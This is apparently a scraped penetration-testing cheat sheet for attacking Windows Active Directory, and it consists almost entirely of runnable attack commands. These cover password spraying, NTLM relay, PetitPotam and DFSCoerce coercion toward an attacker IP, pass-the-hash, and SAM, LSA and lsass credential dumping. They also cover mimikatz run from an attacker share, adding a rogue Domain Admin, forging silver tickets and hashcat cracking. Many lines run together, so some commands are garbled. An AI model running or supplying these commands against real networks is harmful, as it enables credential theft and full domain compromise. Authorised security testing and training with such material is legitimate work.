https://github.com/NotMedic/NetNTLMtoSilverTicket
https://www.n00py.io/2022/10/practical-attacks-against-ntlmv1/
How to pentest like a Gunnaj
Utils
https://github.com/GoVanguard/legion
Installation
https://www.reddit.com/r/Kalilinux/comments/1ann3xo/legion_running_perfectly_then_it_disappears/
https://github.com/lefayjey/linWinPwn
Installation
apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExecgit clone https://github.com/lefayjey/linWinPwn
cd linWinPwn; chmod +x linWinPwn.shchmod +x install.sh
./install.shhttps://github.com/BloodHoundAD/BloodHound
https://github.com/lgandx/Responder
Installation
apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExecnano ~/.nxc/nxc.conf[BloodHound]
bh_enabled = True
bh_uri = 127.0.0.1
bh_port = 7687
bh_user = <username>
bh_pass = <password>https://github.com/jfjallid/go-secdump
Installation
git clone https://github.com/jfjallid/go-secdumphttps://github.com/Hackplayers/evil-winrm
Installation
gem install evil-winrmhttps://github.com/p0dalirius/FindUncommonShares
Installation
git clone https://github.com/p0dalirius/FindUncommonShareshttps://github.com/topotam/PetitPotam
https://github.com/Wh04m1001/DFSCoerce
https://github.com/fortra/impacket
https://github.com/skelsec/pypykatz
Installation
pip3 install minidump minikerberos aiowinreg msldap winaclgit clone https://github.com/skelsec/pypykatz.git
cd pypykatzpython3 setup.py installhttps://github.com/ly4k/Certipy
https://github.com/hmaverickadams/breach-parse
https://github.com/RUB-NDS/PRET
Installation
git clone https://github.com/RUB-NDS/PRET && cd PRETpython -m pip install colorama pysnmPLists
https://zzzteph.github.io/weakpass/
https://crackstation.net/files/crackstation.txt.gz (14.6 GB)
https://download.g0tmi1k.com/wordlists/large/36.4GB-18_in_1.lst.7z (48.4 GB)
Sites
NMAP
sudo nmap -sP -p -oN <output.txt> <IP/mask>sudo nmap -PN -sC -sV -p- -oN <output.txt> <IP/mask>sudo nmap -PN --script smb-vuln* -p139,445 -oN <output.txt> <IP/mask>sudo mncli dev show eth0nslookup -type=SRV _ldap._tcp.dc._msdcs.<AD_domain>nltest /dclist:<domainname>linWinPwn
- Module ad_enum
- RID bruteforce using crackmapexec
- Anonymous enumeration using crackmapexec, enum4linux-ng, ldapdomaindump, ldeep
- Pre2k authentication check on collected list of computers
- Module kerberos
- kerbrute user spray
- ASREPRoast using collected list of users (and cracking hashes using john-the-ripper and the rockyou wordlist)
- Blind Kerberoast
- CVE-2022-33679 exploit
- Module scan_shares
- SMB shares anonymous enumeration on identified servers
- Module vuln_checks
- Enumeration for WebDav, dfscoerce, shadowcoerce and Spooler services on identified servers
- Check for ms17-010, zerologon, petitpotam, nopac, smb-sigining, ntlmv1, runasppl weaknesses
sudo ./linWinPwn.sh -t <Domain_Controller_IP_or_Target_Domain> -M user <output_dir>-
DNS extraction using adidnsdump
-
Module ad_enum
- BloodHound data collection
- Enumeration using crackmapexec, enum4linux-ng, ldapdomaindump, windapsearch, SilentHound, ldeep
- Users
- MachineAccountQuota
- Password Policy
- Users' descriptions containing "pass"
- ADCS
- Subnets
- GPP Passwords
- Check if ldap-signing is enforced, check for LDAP Relay
- Delegation information
- crackmapexec find accounts with user=pass
- Pre2k authentication check on domain computers
- Extract ADCS information using certipy and certi.py
-
Module kerberos
- kerbrute find accounts with user=pas
- ASREPRoasting (and cracking hashes using john-the-ripper and the rockyou wordlist)
- Kerberoasting (and cracking hashes using john-the-ripper and the rockyou wordlist)
- Targeted Kerberoasting (and cracking hashes using john-the-ripper and the rockyou wordlist)
-
Module scan_shares
- SMB shares enumeration on all domain servers using smbmap and cme's spider_plus
- KeePass files and processes discovery on all domain servers
-
Module vuln_checks
- Enumeration for WebDav, dfscoerce, shadowcoerce and Spooler services on all domain servers
- Check for ms17-010, ms14-068, zerologon, petitpotam, nopac, smb-signing, ntlmv1, runasppl weaknesses
-
Module mssql_enum
- Check mssql privilege escalation paths
sudo ./linWinPwn.sh -t <Domain_Controller_IP_or_Target_Domain> -u <AD_user> -p <AD_password> -o <output_dir>Responder
responder -I eth0responder -I eth0 --lmresponder -I eth0 -dNetExec lnkfile with slinky
NetExec -smb <Target_IP> -u <AD_user> -p <AD_password> -M slinky -o NAME=<filename> SERVER=<attacker_IP>NetExec -smb <Target_IP> -u <AD_user> -p <AD_password> -M slinky -o NAME=<filename> SERVER=<attacker_IP> CLEANUP=TrueCrackmapexec NTLM-relay
crackmapexec smb <IPs> --gen-relay-list <nosmbsigning.txt>sudo python3 ntlmrelayx.py -of <outfile.txt> -tf <nosmbsigning.txt> -smb2support./go-secdump --host <target> -n --relay[Responder Core]
; Servers to start
SQL = On
SMB = Off
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off
HTTPS = On
DNS = On
LDAP = On
DCERPC = On
WINRM = On
SNMP = Offsudo responder -I eth0 -dwvPetitPotam
python3 PetitPotam.py -d <Domain_Name> -u <AD_user> -p <AD_password> <attacker_IP> <target_IP>DFSCoerce
python3 dfscoerce.py -d <Domain_Name> -u <AD_user> -p <AD_password> <attacker_IP> <target_IP>NetExec Password spray
netexec smb <Domain_Controller_IP> -u users.txt -p <password> --continue-on-successNetExec domain authentication
sudo NetExec smb <Domain_Controller_IP> -u <AD_user> -p <AD_password> -H <hash[LM:NT]> NetExec local authentication
NetExec smb <target_IP> -u <username> -H <hash[LM:NT]> --local-auth NetExec rdp authentication
NetExec rdp <target_IP> -u <username> -H <hash[LM:NT]> --local-auth List readable or writable shares
NetExec smb <target_IP> -u <username> -p <password> --shares --filter-shares READ WRITEList uncommon shares
./FindUncommonShares.py -u <username> -p <password> -d <AD_domain> --dc-ip <Domain_Controller_IP> --check-user-accessMount and unmount shares
sudo mount.cifs <//ip/folder> <./folder> -o user=<username>,password=<password>,dom=<AD_domain>sudo umount <./folder>grep -i <keyword> *Domain authentication
NetExec ldap <target_IP> -u <username> -p <password> -H <hash[LM:NT]]> -M adcsNetExec ldap <target_IP> -u <username> -p <password> -H <hash[LM:NT]> -M masky -o CA=<'ADCS_server_name'>NetExec smb <target_IP> -u <username> -p <password> -H <hash[LM:NT]]> --sam./go-secdump --domain <Domain_Controller_IP --host <target_IP> --user <username> ---pass <password> --hash <hash[LM:NT]]> --samNetExec smb <target_IP> -u <username> -p <password> -H <hash_NT]> --lsa./go-secdump --domain <Domain_Controller_IP --host <target_IP> --user <username> ---pass <password> --hash <hash[LM:NT]]> --lsaLocal authentication
NetExec smb <target_IP> -u <username> -p <password> -H <hash[LM:NT]> --local-auth --sam./go-secdump --domain <Domain_Controller_IP --host <target_IP> --user <username> ---pass <password> --hash <hash[LM:NT]]> --sam --localNetExec smb <target_IP> -u <username> -p <password> -H <hash[LM:NT]> --local-auth --lsa./go-secdump --domain <Domain_Controller_IP --host <target_IP> --user <username> ---pass <password> --hash <hash[LM:NT]]> --lsa --localNetExec Dump lsass with hash_spider to recursively using BloodHound to find local admins path (adminTo)
NetExec smb <target_IP> -u <username> -p <password> -H <hash[LM:NT]> --local-auth -M hash_spiderrundll32.exe keymgr.dll KRShowKeyMgrNetExec dump with ReadLAPSPassword rights
NetExec ldap <AD_domain> -u <username> -p <password> -H <hash[LM:NT]> -M lapsNetExec smb <target_IP> -u <username> -p <password> -H <hash[LM:NT]> -M laps --samNetExec smb <target_IP> -u <username> -p <password> -H <hash[LM:NT]> --M laps --lsaRun Mimikatz from impackets smb share
impacket-smbserver.py <shareName> <sharePath>\\<target_IP>\<shareName>\mimikatz.exe "privilege::debug: sekurlsa::logonpasswords exit" > \\<target_IP>\<shareName>\output.txtlinWinPwn
- All of the "Standard User" checks
- Module pwd_dump
- LAPS and gMSA dump
- secretsdump on all domain servers
- NTDS dump using impacket, crackmapexec and certsync
- Dump lsass on all domain servers using: procdump, lsassy, nanodump, handlekatz, masky
- Extract backup keys using DonPAPI, HEKATOMB
sudo ./linWinPwn.sh -t <Domain_Controller_IP> -d <AD_domain> -u <AD_user> -p <AD_password> -H <hash[LM:NT]> -K <kerbticket[./krb5cc_ticket]> -o <output_dir>Examine lsass dump with pypykatz
pypykatz lsa minidump lsass.DMPNetExec
wmiexecexecutes commands via WMIatexecexecutes commands by scheduling a task with windows task schedulersmbexecexecutes commands by creating and running a service
NetExec <protocol> <target_IP> -u <username> -p <password> -H <hash[LM:NT]]> -x <command>NetExec <protocol> <target_IP> -u <username> -p <password> -H <hash[LM:NT]> -X <command>NetExec <protocol> <target_IP> -u <username> -p <password> -H <hash[LM:NT]> -M schtask_as -o USER=<logged-on-user> CMD=<cmd-command>Evil-WinRM
evil-winrm -i <target_IP> -u <username> -p <password> -H <hash[LM:NT]>Command to add a new Domain Admin
net user <username> <password> /add /domainnet group "Domain Admins" <username> /add /domainpowershell.exe \"Invoke-Command -ComputerName DC01 -ScriptBlock {Add-ADGroupMember -Identity 'Domain Admins' -Members USER.NAME}\"NetExec
Tickets
wmic useraccount where name="USER" get sidpython3 ticketer.py -nthash <nthash> -domain-sid <domain-sid> -domain <AD_domain> -dc-ip <Domain_Controller_IP> -spn <service>/<AD_domain>l <user>python3 ticketer.py -nthash <nthash> -domain-sid <domain-sid> -domain <AD_domain> -dc-ip <Domain_Controller_IP> <user>export KRB5CCNAME=<TGS_ccache_file>klistpython psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-passPRET
nmap -p 9100 <IP/mask>http://hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheetpret.py target {ps,pjl,pcl}Attack modes
hashcat64.exe -m <hash_type> -a 0 <hashes.txt> <passlist.txt> -o cracked.txthashcat64.exe -m <hash_type> -a 1 <hashes.txt> <passlist1.txt> <passlist2.txt> -o cracked.txthashcat64.exe -m <hash_type> -a 3 <hashes.txt> ?a?a?a?a?a?a?a?a --increment -o cracked.txthashcat64.exe -m <hash_type> -a 6 <hashes.txt> <passlist.txt> ?a?a?a?a?a?a?a?a --increment -o cracked.txthashcat64.exe -m <hash_type> -a 7 <hashes.txt> ?a?a?a?a?a?a?a?a --increment <passlist.txt> -o cracked.txt- ?l = abcdefghijklmnopqrstuvwxyz
- ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
- ?d = 0123456789
- ?h = 0123456789abcdef
- ?H = 0123456789ABCDEF
- ?s = «space»!"#$%&'()*+,-./:;<=>?@[]^_`{|}~
- ?a = ?l?u?d?s
- ?b = 0x00 - 0xff
- --increment-min
- --increment-max
Hash types
hashcat64.exe -m 3000 -a 3 <LM-hashes.txt> -o cracked.txthashcat64.exe -m 1000 -a 3 <NTLM-hashes.txt> -o cracked.txthashcat64.exe -m 5500 -a 3 <NTLMv1-hashes.txt> -o cracked.txthashcat64.exe -m 5600 -a 0 <NTLMv2-hashes.txt> <passlist.txt> -o cracked.txthashcat64.exe -m 18200 -a 0 <asrep-hashes.txt> <passlist.txt> -o cracked.txthashcat64.exe -m 13100 -a 0 <krb5tgs-hashes.txt> <passlist.txt> -o cracked.txthashcat64.exe -m 19600 -a 0 <krb5tgsaes128-hashes.txt> <passlist.txt> -o cracked.txthashcat64.exe -m 19700 -a 0 <krb5tgsaes256.txt> <passlist.txt> -o cracked.txthashcat64.exe -m 19800 -a 0 <krb5tetype17.txt> <passlist.txt> -o cracked.txthashcat64.exe -m 19900 -a 0 <krb5tetype18.txt> <passlist.txt> -o cracked.txthashcat64.exe -m 2100 -a 0 <mscache2-hashes.txt> <passlist.txt> -o cracked.txt